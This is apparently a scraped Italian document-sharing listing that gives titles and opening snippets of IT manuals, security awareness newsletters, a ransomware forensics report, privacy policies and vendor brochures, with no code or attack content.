Privacy Policy del sito http://www.plastic-glass.com Cos'è una PRIVACY POLICY Privacy Policy del sito http://www.plastic-glass.com Questo documento, concernente le politiche di riservatezza dei dati personali di chi gestisce il sito Internet http://www.plastic-glass.com

Dettagli

Un'infrastruttura IT inadeguata provoca danni in tre organizzazioni su cinque

Un'infrastruttura IT inadeguata provoca danni in tre organizzazioni su cinque L'attuale ambiente di business è senz'altro maturo e ricco di opportunità, ma anche pieno di rischi. Questa dicotomia si sta facendo sempre più evidente nel mondo dell'it, oltre che in tutte le sale riunioni

Dettagli

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a:

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a: Lab 4.1 Utilizzare FTP (File Tranfer Protocol) LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) In questa lezione imparerete a: Utilizzare altri servizi Internet, Collegarsi al servizio Telnet, Accedere

Dettagli

EUROPEAN COMPUTER DRIVING LICENCE. IT Security. Syllabus

EUROPEAN COMPUTER DRIVING LICENCE. IT Security. Syllabus EUROPEAN COMPUTER DRIVING LICENCE IT Security Syllabus Scopo Questo documento presenta il syllabus di ECDL Standard IT Security. Il syllabus descrive, attraverso i risultati del processo di apprendimento,

Dettagli

Ottimizzazione della gestione del data center con Microsoft System Center

Ottimizzazione della gestione del data center con Microsoft System Center Ottimizzazione della gestione del data center con Microsoft System Center Declinazione di responsabilità e informazioni sul copyright Le informazioni contenute nel presente documento rappresentano le conoscenze

Dettagli

La Truffa Che Viene Dal Call Center

La Truffa Che Viene Dal Call Center OUCH! Luglio 2012 IN QUESTO NUMERO Introduzione La Truffa Come Proteggersi La Truffa Che Viene Dal Call Center L AUTORE DI QUESTO NUMERO A questo numero ha collaborato Lenny Zeltser. Lenny si occupa normalmente

Dettagli

Guida alla scansione su FTP

Guida alla scansione su FTP Guida alla scansione su FTP Per ottenere informazioni di base sulla rete e sulle funzionalità di rete avanzate della macchina Brother, consultare la uu Guida dell'utente in rete. Per ottenere informazioni

Dettagli

SICUREZZA SENZA COMPROMESSI PER TUTTI GLI AMBIENTI VIRTUALI. Security for Virtual and Cloud Environments

SICUREZZA SENZA COMPROMESSI PER TUTTI GLI AMBIENTI VIRTUALI. Security for Virtual and Cloud Environments SICUREZZA SENZA COMPROMESSI PER TUTTI GLI AMBIENTI VIRTUALI Security for Virtual and Cloud Environments PROTEZIONE O PRESTAZIONI? Già nel 2009, il numero di macchine virtuali aveva superato quello dei

Dettagli

Guida ai Servizi Internet per il Referente Aziendale

Guida ai Servizi Internet per il Referente Aziendale Guida ai Servizi Internet per il Referente Aziendale Indice Indice Introduzione...3 Guida al primo accesso...3 Accessi successivi...5 Amministrazione dei servizi avanzati (VAS)...6 Attivazione dei VAS...7

Dettagli

Guida del prodotto. McAfee SaaS Endpoint Protection (versione di ottobre 2012)

Guida del prodotto. McAfee SaaS Endpoint Protection (versione di ottobre 2012) Guida del prodotto McAfee SaaS Endpoint Protection (versione di ottobre 2012) COPYRIGHT Copyright 2012 McAfee, Inc. Copia non consentita senza autorizzazione. ATTRIBUZIONI DEI MARCHI McAfee, il logo McAfee,

Dettagli

Plesk Automation. Parallels. Domande tecniche più frequenti

Plesk Automation. Parallels. Domande tecniche più frequenti Parallels Plesk Automation Primo trimestre, 2013 Domande tecniche più frequenti Questo documento ha come scopo quello di rispondere alle domande tecniche che possono sorgere quando si installa e si utilizza

Dettagli

Proteggere le informazioni in tempo di crisi: si può essere sicuri con investimenti contenuti? Lino Fornaro Net1 sas Giovanni Giovannelli - Sophos

Proteggere le informazioni in tempo di crisi: si può essere sicuri con investimenti contenuti? Lino Fornaro Net1 sas Giovanni Giovannelli - Sophos Proteggere le informazioni in tempo di crisi: si può essere sicuri con investimenti contenuti? Lino Fornaro Net1 sas Giovanni Giovannelli - Sophos L Autore Lino Fornaro, Security Consultant Amministratore

Dettagli

Come configurare un programma di posta con l account PEC di GLOBALCERT.IT

Come configurare un programma di posta con l account PEC di GLOBALCERT.IT Come configurare un programma di posta con l account PEC di GLOBALCERT.IT Il Titolare di una nuova casella PEC può accedere al sistema sia tramite Web (Webmail i ), sia configurando il proprio account

Dettagli

Manuale d uso Apache OpenMeetings (Manuale Utente + Manuale Amministratore)

Manuale d uso Apache OpenMeetings (Manuale Utente + Manuale Amministratore) Manuale d uso Apache OpenMeetings (Manuale Utente + Manuale Amministratore) Autore: Matteo Veroni Email: matver87@gmail.com Sito web: matteoveroni@altervista.org Fonti consultate: http://openmeetings.apache.org/

Dettagli

TorrentLocker Enti Italiani sotto riscatto

TorrentLocker Enti Italiani sotto riscatto Digital Forensics Bureau www.difob.it TorrentLocker Enti Italiani sotto riscatto Paolo DAL CHECCO, Giuseppe DEZZANI Studio DIgital Forensics Bureau di Torino 20 ottobre 2014 Da mercoledì 15 ottobre stiamo

Dettagli

GESTIONE DELLA E-MAIL

GESTIONE DELLA E-MAIL GESTIONE DELLA E-MAIL Esistono due metodologie, completamente diverse tra loro, in grado di consentire la gestione di più caselle di Posta Elettronica: 1. tramite un'interfaccia Web Mail; 2. tramite alcuni

Dettagli

CARATTERISTICHE DELLE CRYPTO BOX

CARATTERISTICHE DELLE CRYPTO BOX Secure Stream PANORAMICA Il sistema Secure Stream è costituito da due appliance (Crypto BOX) in grado di stabilire tra loro un collegamento sicuro. Le Crypto BOX sono dei veri e propri router in grado

Dettagli

TERMINI E CONDIZIONI DI UTILIZZO

TERMINI E CONDIZIONI DI UTILIZZO Informazioni Societarie Fondazione Prada Largo Isarco 2 20139 Milano, Italia P.IVA e codice fiscale 08963760965 telefono +39.02.56662611 fax +39.02.56662601 email: amministrazione@fondazioneprada.org TERMINI

Dettagli

FileMaker Server 13. Guida introduttiva

FileMaker Server 13. Guida introduttiva FileMaker Server 13 Guida introduttiva 2007-2013 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 Stati Uniti FileMaker e Bento sono marchi

Dettagli

Manuale - TeamViewer 6.0

Manuale - TeamViewer 6.0 Manuale - TeamViewer 6.0 Revision TeamViewer 6.0 9947c Indice Indice 1 Ambito di applicazione... 1 1.1 Informazioni su TeamViewer... 1 1.2 Le nuove funzionalità della Versione 6.0... 1 1.3 Funzioni delle

Dettagli

FIRESHOP.NET. Gestione Utility & Configurazioni. Rev. 2014.3.1 www.firesoft.it

FIRESHOP.NET. Gestione Utility & Configurazioni. Rev. 2014.3.1 www.firesoft.it FIRESHOP.NET Gestione Utility & Configurazioni Rev. 2014.3.1 www.firesoft.it Sommario SOMMARIO Introduzione... 4 Impostare i dati della propria azienda... 5 Aggiornare il programma... 6 Controllare l integrità

Dettagli

Ultimo aggiornamento avvenuto il 18 giugno 2014. Sostituisce la versione del 2 maggio 2013 nella sua interezza.

Ultimo aggiornamento avvenuto il 18 giugno 2014. Sostituisce la versione del 2 maggio 2013 nella sua interezza. Condizioni di utilizzo aggiuntive di Acrobat.com Ultimo aggiornamento avvenuto il 18 giugno 2014. Sostituisce la versione del 2 maggio 2013 nella sua interezza. SERVIZI ONLINE ADOBE RESI DISPONIBILI SU

Dettagli

Installazione di GFI Network Server Monitor

Installazione di GFI Network Server Monitor Installazione di GFI Network Server Monitor Requisiti di sistema I computer che eseguono GFI Network Server Monitor richiedono: i sistemi operativi Windows 2000 (SP4 o superiore), 2003 o XP Pro Windows

Dettagli

Articolo. Dieci buoni motivi per acquistare una telecamere di rete Ovvero, quello che il vostro fornitore di telecamere analogiche non vi dirà mai

Articolo. Dieci buoni motivi per acquistare una telecamere di rete Ovvero, quello che il vostro fornitore di telecamere analogiche non vi dirà mai Articolo Dieci buoni motivi per acquistare una telecamere di rete Ovvero, quello che il vostro fornitore di telecamere analogiche non vi dirà mai INDICE Introduzione 3 Dieci cose che il vostro fornitore

Dettagli

Windows Mail Outlook Express 6 Microsoft Outlook 2003 Microsoft Outlook 2007 Thunderbird Opera Mail Mac Mail

Windows Mail Outlook Express 6 Microsoft Outlook 2003 Microsoft Outlook 2007 Thunderbird Opera Mail Mac Mail Configurare un programma di posta con l account PEC di Il Titolare di una nuova casella PEC può accedere al sistema sia tramite Web (Webmail i ), sia configurando il proprio account ii nel programma di

Dettagli

Il portafoglio VidyoConferencing. Tutto ciò di cui avete bisogno per realizzare videoconferenze HD di qualità, accessibili e a costi vantaggiosi

Il portafoglio VidyoConferencing. Tutto ciò di cui avete bisogno per realizzare videoconferenze HD di qualità, accessibili e a costi vantaggiosi Il portafoglio VidyoConferencing Tutto ciò di cui avete bisogno per realizzare videoconferenze HD di qualità, accessibili e a costi vantaggiosi La qualità HD di Vidyo mi permette di vedere e ascoltare

Dettagli

Cosa fare in caso di perdita di smartphone o tablet

Cosa fare in caso di perdita di smartphone o tablet OUCH! Ottobre 2012 IN QUESTO NUMERO Introduzione Le precauzioni da prendere Cosa fare in caso di smarrimento o furto Cosa fare in caso di perdita di smartphone o tablet L AUTORE DI QUESTO NUMERO Heather

Dettagli

COME FRODE. la possibilità propri dati. brevissimo. Reply www.reply.eu

COME FRODE. la possibilità propri dati. brevissimo. Reply www.reply.eu FRAUD MANAGEMENT. COME IDENTIFICARE E COMB BATTERE FRODI PRIMA CHE ACCADANO LE Con una visione sia sui processi di business, sia sui sistemi, Reply è pronta ad offrire soluzioni innovative di Fraud Management,

Dettagli

roberto.albiero@cnr.it

roberto.albiero@cnr.it Syllabus 5.0 Roberto Albiero Modulo 7 Navigazione web e comunicazione Navigazione web e comunicazione, è diviso in due sezioni. La prima sezione, Navigazione web, permetterà al discente di entrare in

Dettagli

La informiamo che Utroneo s.r.l. è il titolare del trattamento dei suoi dati personali.

La informiamo che Utroneo s.r.l. è il titolare del trattamento dei suoi dati personali. Come utilizziamo i suoi dati è un prodotto di ULTRONEO SRL INFORMAZIONI GENERALI Ultroneo S.r.l. rispetta il Suo diritto alla privacy nel mondo di internet quando Lei utilizza i nostri siti web e comunica

Dettagli

Sempre attenti ad ogni dettaglio Bosch Intelligent Video Analysis

Sempre attenti ad ogni dettaglio Bosch Intelligent Video Analysis Sempre attenti ad ogni dettaglio Bosch Intelligent Video Analysis 2 Intervento immediato con Bosch Intelligent Video Analysis Indipendentemente da quante telecamere il sistema utilizza, la sorveglianza

Dettagli

Guida alla prevenzione della pirateria software SIMATIC

Guida alla prevenzione della pirateria software SIMATIC Guida alla prevenzione della pirateria software SIMATIC Introduzione Questa guida è stata realizzata per aiutare la vostra azienda a garantire l utilizzo legale del software di Siemens. Il documento tratta

Dettagli

Tutela dei dati personali Vi ringraziamo per aver visitato il nostro sito web e per l'interesse nella nostra società. La tutela dei vostri dati privati riveste per noi grande importanza e vogliamo quindi

Dettagli

Indagine sull utilizzo di Internet a casa e a scuola

Indagine sull utilizzo di Internet a casa e a scuola Indagine sull utilizzo di Internet a casa e a scuola Realizzata da: Commissionata da: 1 INDICE 1. Metodologia della ricerca Pag. 3 2. Genitori e Internet 2.1 L utilizzo del computer e di Internet in famiglia

Dettagli

Come installare e configurare il software FileZilla

Come installare e configurare il software FileZilla Come utilizzare FileZilla per accedere ad un server FTP Con questo tutorial verrà mostrato come installare, configurare il software e accedere ad un server FTP, come ad esempio quello dedicato ai siti

Dettagli

TeamViewer 8 Manuale Meeting

TeamViewer 8 Manuale Meeting TeamViewer 8 Manuale Meeting Rev 8.0-12/2012 TeamViewer GmbH Kuhnbergstraße 16 D-73037 Göppingen www.teamviewer.com Indice 1 Informazioni su TeamViewer... 5 1.1 Informazioni sul software... 5 1.2 Informazioni

Dettagli

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software.

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software. Generalità Definizione Un firewall è un sistema che protegge i computer connessi in rete da attacchi intenzionali mirati a compromettere il funzionamento del sistema, alterare i dati ivi memorizzati, accedere

Dettagli

***** Il software IBM e semplice *****

***** Il software IBM e semplice ***** Il IBM e semplice ***** ***** Tutto quello che hai sempre voluto sapere sui prodotti IBM per qualificare i potenziali clienti, sensibilizzarli sulle nostre offerte e riuscire a convincerli. WebSphere IL

Dettagli

Mobile Messaging SMS. Copyright 2015 VOLA S.p.A.

Mobile Messaging SMS. Copyright 2015 VOLA S.p.A. Mobile Messaging SMS Copyright 2015 VOLA S.p.A. INDICE Mobile Messaging SMS. 2 SMS e sistemi aziendali.. 2 Creare campagne di mobile marketing con i servizi Vola SMS.. 3 VOLASMS per inviare SMS da web..

Dettagli

Acronis Backup & Recovery 10 Advanced Server Virtual Edition. Guida introduttiva

Acronis Backup & Recovery 10 Advanced Server Virtual Edition. Guida introduttiva Acronis Backup & Recovery 10 Advanced Server Virtual Edition Guida introduttiva Questo documento descrive come installare e iniziare a utilizzare Acronis Backup & Recovery 10 Advanced Server Virtual Edition.

Dettagli

Termini di servizio di Comunicherete

Termini di servizio di Comunicherete Termini di servizio di Comunicherete I Servizi sono forniti da 10Q Srls con sede in Roma, Viale Marx n. 198 ed Ancitel Spa, con sede in Roma, Via Arco di Travertino n. 11. L utilizzo o l accesso ai Servizi

Dettagli

Profilo Commerciale Collabor@

Profilo Commerciale Collabor@ Profilo Commerciale Collabor@ 1. DESCRIZIONE DEL SERVIZIO E REQUISITI Collabor@ è un servizio di web conferenza basato sulla piattaforma Cisco WebEx, che consente di organizzare e svolgere riunioni web,

Dettagli

Note legali. Termini e condizioni di utilizzo. Modifiche dei Termini e Condizioni di Utilizzo. Accettazione dei Termini e Condizioni

Note legali. Termini e condizioni di utilizzo. Modifiche dei Termini e Condizioni di Utilizzo. Accettazione dei Termini e Condizioni Note legali Termini e condizioni di utilizzo Accettazione dei Termini e Condizioni L'accettazione puntuale dei termini, delle condizioni e delle avvertenze contenute in questo sito Web e negli altri siti

Dettagli

SERVER VIDEO 1-PORTA H.264

SERVER VIDEO 1-PORTA H.264 SERVER VIDEO 1-PORTA H.264 MANUALE UTENTE DN-16100 SALVAGUARDIA IMPORTANTE Tutti i prodotti senza piombo offerti dall'azienda sono a norma con i requisiti della legge Europea sulla restrizione per l'uso

Dettagli

2013 Skebby. Tutti i diritti riservati.

2013 Skebby. Tutti i diritti riservati. Disclaimer: "# $%&'(&)'%# *("# +,(-(&'(# *%$).(&'%#,/++,(-(&'/# 0"#.(1"0%# *(""20&3%,./40%&(# /# &%-',/# disposizione. Abbiamo fatto del nostro meglio per assicurare accuratezza e correttezza delle informazioni

Dettagli

Guida al nuovo sistema di posta. CloudMail UCSC. (rev.doc. 1.4)

Guida al nuovo sistema di posta. CloudMail UCSC. (rev.doc. 1.4) Guida al nuovo sistema di posta CloudMail UCSC (rev.doc. 1.4) L Università per poter migliorare l utilizzo del sistema di posta adeguandolo agli standard funzionali più diffusi ha previsto la migrazione

Dettagli

ALFABETIZZAZIONE DI BASE Programma del Corso livello base

ALFABETIZZAZIONE DI BASE Programma del Corso livello base Un po di Storia ISP & Web Engineering ALFABETIZZAZIONE DI BASE Programma del Corso livello base Breve cenno sulla storia dell informatica: dagli albori ai giorni nostri; L evoluzione di Windows: dalla

Dettagli

Software 2. Classificazione del software. Software di sistema

Software 2. Classificazione del software. Software di sistema Software 2 Insieme di istruzioni e programmi che consentono il funzionamento del computer Il software indica all hardware quali sono le operazioni da eseguire per svolgere determinati compiti Valore spesso

Dettagli

C O M E I N I Z I A R E A U S A R E U N T A B L E T A N D R O I D

C O M E I N I Z I A R E A U S A R E U N T A B L E T A N D R O I D C O M E I N I Z I A R E A U S A R E U N T A B L E T A N D R O I D Se avete un tablet android, ma non avete la minima idea di come accenderlo, usarlo e avviarlo, seguite queste nostre indicazioni 1. ATTIVAZIONE

Dettagli

TeamViewer introduce l applicazione per Outlook. Il collegamento diretto con i contatti di Outlook è ora possibile grazie a TeamViewer

TeamViewer introduce l applicazione per Outlook. Il collegamento diretto con i contatti di Outlook è ora possibile grazie a TeamViewer Press Release TeamViewer introduce l applicazione per Outlook Il collegamento diretto con i contatti di Outlook è ora possibile grazie a TeamViewer Goeppingen, Germania, 28 aprile 2015 TeamViewer, uno

Dettagli

Ultimo aggiornamento avvenuto il 18 giugno 2014. Sostituisce la versione del febbraio 17, 2012 nella sua interezza.

Ultimo aggiornamento avvenuto il 18 giugno 2014. Sostituisce la versione del febbraio 17, 2012 nella sua interezza. Termini d uso aggiuntivi di Business Catalyst Ultimo aggiornamento avvenuto il 18 giugno 2014. Sostituisce la versione del febbraio 17, 2012 nella sua interezza. L uso dei Servizi Business Catalyst è soggetto

Dettagli

IT-BOOK. Domini Hosting Web marketing E-mail e PEC

IT-BOOK. Domini Hosting Web marketing E-mail e PEC 5 giugno 09 IT-BOOK Configurazioni e cartatteristiche tecniche possono essere soggette a variazioni senza preavviso. Tutti i marchi citati sono registrati dai rispettivi proprietari. Non gettare per terra:

Dettagli

INFORMATIVA PRIVACY AI VISITATORI DEL SITO www.wdc-international.com

INFORMATIVA PRIVACY AI VISITATORI DEL SITO www.wdc-international.com INFORMATIVA PRIVACY AI VISITATORI DEL SITO www.wdc-international.com La presente Informativa è resa, anche ai sensi del ai sensi del Data Protection Act 1998, ai visitatori (i Visitatori ) del sito Internet

Dettagli

Seagate Access per Personal Cloud Manuale utente

Seagate Access per Personal Cloud Manuale utente Seagate Access per Personal Cloud Manuale utente 2015 Seagate Technology LLC. Tutti i diritti riservati. Seagate, Seagate Technology, il logo Wave e FreeAgent sono marchi depositati o marchi registrati

Dettagli

Guida dell amministratore

Guida dell amministratore Guida dell amministratore Le informazioni e il contenuto del presente documento vengono forniti esclusivamente a scopi informativi e come sono, senza garanzie di alcun tipo, sia espresse che implicite,

Dettagli

BUONE, CATTIVE O INVADENTI: SAI VERAMENTE COSA FANNO LE TUE APP?

BUONE, CATTIVE O INVADENTI: SAI VERAMENTE COSA FANNO LE TUE APP? BUONE, CATTIVE O INVADENTI: SAI VERAMENTE COSA FANNO LE TUE APP? Le app sono divertenti, utili e gratuite, ma qualche volta hanno anche costi nascosti e comportamenti nocivi. Non aspettare che ti capiti

Dettagli

Cosa fare in caso di violazioni di sicurezza

Cosa fare in caso di violazioni di sicurezza OUCH! Settembre 2012 IN QUESTO NUMERO I vostri account utente I vostri dispositivi I vostri dati Cosa fare in caso di violazioni di sicurezza L AUTORE DI QUESTO NUMERO Chad Tilbury ha collaborato alla

Dettagli

Analisi dei requisiti e casi d uso

Analisi dei requisiti e casi d uso Analisi dei requisiti e casi d uso Indice 1 Introduzione 2 1.1 Terminologia........................... 2 2 Modello della Web Application 5 3 Struttura della web Application 6 4 Casi di utilizzo della Web

Dettagli

Arcserve Replication and High Availability

Arcserve Replication and High Availability Arcserve Replication and High Availability Guida operativa per Oracle Server per Windows r16.5 La presente documentazione, che include il sistema di guida in linea integrato e materiale distribuibile elettronicamente

Dettagli

Mettere in sicurezza l infrastruttura dei desktop virtuali con Citrix NetScaler

Mettere in sicurezza l infrastruttura dei desktop virtuali con Citrix NetScaler Mettere in sicurezza l infrastruttura dei desktop virtuali con Citrix NetScaler 2 Le aziende attuali stanno adottando rapidamente la virtualizzazione desktop quale mezzo per ridurre i costi operativi,

Dettagli

FileMaker Server 13. Guida di FileMaker Server

FileMaker Server 13. Guida di FileMaker Server FileMaker Server 13 Guida di FileMaker Server 2010-2013 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 Stati Uniti FileMaker e Bento sono

Dettagli

Alb@conference GO e Web Tools

Alb@conference GO e Web Tools Alb@conference GO e Web Tools Crea riunioni virtuali sempre più efficaci Strumenti Web di Alb@conference GO Guida Utente Avanzata Alb@conference GO Per partecipare ad un audioconferenza online con Alb@conference

Dettagli

con software libero Modulo 12 IT Security Pag. 1

con software libero Modulo 12 IT Security Pag. 1 con software libero Modulo 12 IT Security Pag. 1 Indice generale IT SECURITY... 3 1 Concetti di sicurezza...3 1.1 MINACCE AI DATI...3 1.2 VALORE DELLE INFORMAZIONI...3 1.3 SICUREZZA PERSONALE...4 1.4 SICUREZZA

Dettagli

MANUALE UTENTE DEL SOFTWARE DI GESTIONE DEGLI ART. SDVR040A/SDVR080A/SDVR160A

MANUALE UTENTE DEL SOFTWARE DI GESTIONE DEGLI ART. SDVR040A/SDVR080A/SDVR160A MANUALE UTENTE DEL SOFTWARE DI GESTIONE DEGLI ART. SDVR040A/SDVR080A/SDVR160A Leggere attentamente questo manuale prima dell utilizzo e conservarlo per consultazioni future Via Don Arrigoni, 5 24020 Rovetta

Dettagli

Guida all'installazione di WiFi Booster WN1000RP per dispositivi mobili

Guida all'installazione di WiFi Booster WN1000RP per dispositivi mobili Guida all'installazione di WiFi Booster WN1000RP per dispositivi mobili 2012 NETGEAR, Inc. Tutti i diritti riservati. Nessuna parte della presente pubblicazione può essere riprodotta, trasmessa, trascritta,

Dettagli

Guida alle offerte di finanziamento per le medie imprese

Guida alle offerte di finanziamento per le medie imprese IBM Global Financing Guida alle offerte di finanziamento per le medie imprese Realizzata da IBM Global Financing ibm.com/financing/it Guida alle offerte di finanziamento per le medie imprese La gestione

Dettagli

Allegato 8 MISURE MINIME ED IDONEE

Allegato 8 MISURE MINIME ED IDONEE Allegato 8 MISURE MINIME ED IDONEE SOMMARIO 1 POLITICHE DELLA SICUREZZA INFORMATICA...3 2 ORGANIZZAZIONE PER LA SICUREZZA...3 3 SICUREZZA DEL PERSONALE...3 4 SICUREZZA MATERIALE E AMBIENTALE...4 5 GESTIONE

Dettagli

Gestione posta elettronica (versione 1.1)

Gestione posta elettronica (versione 1.1) Gestione posta elettronica (versione 1.1) Premessa La presente guida illustra le fasi da seguire per una corretta gestione della posta elettronica ai fini della protocollazione in entrata delle mail (o

Dettagli

ORACLE BUSINESS INTELLIGENCE STANDARD EDITION ONE A WORLD CLASS PERFORMANCE

ORACLE BUSINESS INTELLIGENCE STANDARD EDITION ONE A WORLD CLASS PERFORMANCE ORACLE BUSINESS INTELLIGENCE STANDARD EDITION ONE A WORLD CLASS PERFORMANCE Oracle Business Intelligence Standard Edition One è una soluzione BI completa, integrata destinata alle piccole e medie imprese.oracle

Dettagli

Smartphone Innovations S.r.l. gestisce il sito www.stonexone.com ( Sito ). Smartphone Innovations S.r.l.

Smartphone Innovations S.r.l. gestisce il sito www.stonexone.com ( Sito ). Smartphone Innovations S.r.l. TERMINI E CONDIZIONI Smartphone Innovations S.r.l. gestisce il sito www.stonexone.com ( Sito ). Smartphone Innovations S.r.l. ha predisposto le seguenti Condizioni generali per l utilizzo del Servizio

Dettagli

Energy Studio Manager Manuale Utente USO DEL SOFTWARE

Energy Studio Manager Manuale Utente USO DEL SOFTWARE Energy Studio Manager Manuale Utente USO DEL SOFTWARE 1 ANALYSIS.EXE IL PROGRAMMA: Una volta aperto il programma e visualizzato uno strumento il programma apparirà come nell esempio seguente: Il programma

Dettagli

iphone in azienda Guida alla configurazione per gli utenti

iphone in azienda Guida alla configurazione per gli utenti iphone in azienda Guida alla configurazione per gli utenti iphone è pronto per le aziende. Supporta Microsoft Exchange ActiveSync, così come servizi basati su standard, invio e ricezione di e-mail, calendari

Dettagli

MARKETING INTELLIGENCE SUL WEB:

MARKETING INTELLIGENCE SUL WEB: Via Durini, 23-20122 Milano (MI) Tel.+39.02.77.88.931 Fax +39.02.76.31.33.84 Piazza Marconi,15-00144 Roma Tel.+39.06.32.80.37.33 Fax +39.06.32.80.36.00 www.valuelab.it valuelab@valuelab.it MARKETING INTELLIGENCE

Dettagli

MATRICE DELLE FUNZIONI DI DRAGON NATURALLYSPEAKING 12 CONFRONTO TRA EDIZIONI DEL PRODOTTO

MATRICE DELLE FUNZIONI DI DRAGON NATURALLYSPEAKING 12 CONFRONTO TRA EDIZIONI DEL PRODOTTO MATRICE DELLE FUNZIONI DI DRAGON NATURALLYSPEAKING 12 CONFRONTO TRA EDIZIONI DEL PRODOTTO Precisione del riconoscimento Velocità di riconoscimento Configurazione del sistema Correzione Regolazione della

Dettagli

progettiamo e realizziamo architetture informatiche Company Profile

progettiamo e realizziamo architetture informatiche Company Profile Company Profile Chi siamo Kammatech Consulting S.r.l. nasce nel 2000 con l'obiettivo di operare nel settore I.C.T., fornendo servizi di progettazione, realizzazione e manutenzione di reti aziendali. Nel

Dettagli

www.queen.it info@mbox.queen.it Gruppo Queen.it Listino Utente Finale Gennaio 2001

www.queen.it info@mbox.queen.it Gruppo Queen.it Listino Utente Finale Gennaio 2001 Listino Gennaio 2001 pag. 1 Gruppo Queen.it Listino Utente Finale Gennaio 2001 Profilo aziendale Chi è il Gruppo Queen.it Pag. 2 Listino connettività Listino Connettività RTC Pag. 3 Listino Connettività

Dettagli

la Guida completa per aumentare il numero di Mi piace su Facebook

la Guida completa per aumentare il numero di Mi piace su Facebook wishpond EBOOK la Guida completa per aumentare il numero di Mi piace su Facebook wishpond.it indice Capitolo 1 Metodo #1 per aumentare i Mi piace su Facebook: Concorsi 5 Capitolo 5 Metodo #5 per aumentare

Dettagli

Utilizzato con successo nei più svariati settori aziendali, Passepartout Mexal BP è disponibile in diverse versioni e configurazioni:

Utilizzato con successo nei più svariati settori aziendali, Passepartout Mexal BP è disponibile in diverse versioni e configurazioni: Passepartout Mexal BP è una soluzione gestionale potente e completa per le imprese che necessitano di un prodotto estremamente flessibile, sia dal punto di vista tecnologico sia funzionale. Con più di

Dettagli

Premessa. Tratto dall introduzione di e-competence Framework for ICT User

Premessa. Tratto dall introduzione di e-competence Framework for ICT User Programma analitico d esame EIPASS 7 Moduli User - Rev. 4.0 del 16/02/2015 1 Premessa La competitività, l innovazione, l occupazione e la coesione sociale dipendono sempre più da un uso strategico ed efficace

Dettagli

PASSIONE PER L IT PROLAN. network solutions

PASSIONE PER L IT PROLAN. network solutions PASSIONE PER L IT PROLAN network solutions CHI SIAMO Aree di intervento PROFILO AZIENDALE Prolan Network Solutions nasce a Roma nel 2004 dall incontro di professionisti uniti da un valore comune: la passione

Dettagli

DOCUMENTO TECNICO Un sistema più intel igente per control are i punti vendita: sorveglianza IP

DOCUMENTO TECNICO Un sistema più intel igente per control are i punti vendita: sorveglianza IP DOCUMENTO TECNICO Un sistema più intelligente per controllare i punti vendita: sorveglianza IP Guida descrittiva dei vantaggi dei sistemi di gestione e di sorveglianza IP per i responsabili dei punti vendita

Dettagli